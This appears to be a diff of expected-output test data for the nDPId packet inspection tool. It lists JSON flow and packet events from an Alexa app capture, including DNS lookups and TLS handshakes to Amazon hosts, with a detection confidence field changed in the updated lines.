{"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041680,"flow_last_seen":1490976041680,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041680,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40202,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1490976041680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041680,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzJAAEAGfuesECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9j3AAAAgQFtAQCCAoA9k6YAAAAAAEDAwg="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041770,"flow_last_seen":1490976041770,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976041770,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1490976041770,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1490976041770,"pkt":"AMDKkaPvePiC0\/vCCABFAABVWlRAAEARM0qsECrYrBAqAVOPADUAQZgzlqMBAAABAAAAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQAB"} -00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041770,"flow_last_seen":1490976041770,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976041770,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":249,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041770,"flow_last_seen":1490976041770,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976041770,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041806,"flow_last_seen":1490976041806,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976041806,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1490976041806,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041806,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WlVAAEARM2KsECrYrBAqActtADUAKHKAa+oBAAABAAAAAAAAA3d3dwZhbWF6b24DY29tAAABAAE="} 
-00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041806,"flow_last_seen":1490976041806,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976041806,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":250,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041806,"flow_last_seen":1490976041806,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976041806,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1490976041866,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976041866,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl0nZAAEARuxesECoBrBAq2AA1U48AUSKClqOBgAABAAEAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQABwAwAAQABAAAAOQAENu8Yug=="} -00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976041866,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.24.186"}} +00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":251,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041770,"flow_last_seen":1490976041866,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976041866,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":21391,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.24.186"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041870,"flow_last_seen":1490976041870,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041870,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1490976041870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041870,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8YDpAAEAGs\/CsECrYNu8YuoTjAbvEzS6RAAAAAKAC\/\/9XzwAAAgQFtAQCCAoA9k6rAAAAAAEDAwg="} 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1490976041938,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1490976041938,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC90nlAAEARurysECoBrBAq2AA1y20AqYS4a+qBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAABMAAoDd3d3A2NkbsAQwCwABQABAAAA+AAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAAAgABDRV0djAQgABAAEAAAAIAAQ0VdHFwEIAAQABAAAACAAENFXRj8BCAAEAAQAAAAgABDRV0Xo="} 
-00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976041938,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.216"}} +00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041806,"flow_last_seen":1490976041938,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976041938,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.216"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041942,"flow_last_seen":1490976041942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041942,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1490976041942,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041942,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BJdAAEAGWQ+sECrYNFXR2NSLAbvD9kolAAAAAKAC\/\/823gAAAgQFtAQCCAoA9k6yAAAAAAEDAwg="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1490976041952,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976041952,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwusBAAOcGsnU27xi6rBAq2AG7hOPN4I6FxM0uknASH\/5nFQAAAgQFtAEDAwY="} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1490976041953,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976041953,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoYDtAAEAGtAOsECrYNu8YuoTjAbvEzS6SzeCOhlAQAVexhgAA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976041961,"flow_last_seen":1490976041961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976041961,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1490976041961,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041961,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8261AAEAGgfisECrYNFXR2NSMAbsYT5UZAAAAAKAC\/\/+XjgAAAgQFtAQCCAoA9k60AAAAAAEDAwg="} 
-00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041870,"flow_last_seen":1490976041962,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976041962,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041870,"flow_last_seen":1490976041962,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976041962,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1490976041989,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976041989,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71Iuwz0jww\/ZKJqAScSDA4QAAAgQFtAQCCAptm51vAPZOsgEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1490976041995,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976041995,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0BJhAAEAGWRasECrYNFXR2NSLAbvD9komsM9I8YAQAVdfcwAAAQEICgD2Trdtm51v"} -00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041942,"flow_last_seen":1490976041995,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976041995,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041942,"flow_last_seen":1490976041995,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976041995,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976042054,"flow_last_seen":1490976042054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976042054,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1490976042054,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042054,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8AfNAAEAGW7OsECrYNFXR2NSNAbumNE9OAAAAAKAC\/\/9PagAAAgQFtAQCCAoA9k69AAAAAAEDAwg="} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1490976042056,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976042056,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71Iw+cfkHGE+VGqAScSB8QwAAAgQFtAQCCAps\/wWhAPZOtAEDAwg="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1490976042057,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976042057,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0265AAEAGgf+sECrYNFXR2NSMAbsYT5UaPnH5CIAQAVca0QAAAQEICgD2Tr1s\/wWh"} -00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041961,"flow_last_seen":1490976042058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976042058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":269,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976041942,"flow_last_seen":1490976042081,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1650,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1490976042081,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01387{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":271,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976041942,"flow_last_seen":1490976042082,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4546,"flow_avg_l4_payload_len":505,"midstream":0,"thread_ts_msec":1490976042082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","alpn":"h2,http\/1.1","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} +00852{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976041961,"flow_last_seen":1490976042058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":202,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1490976042058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
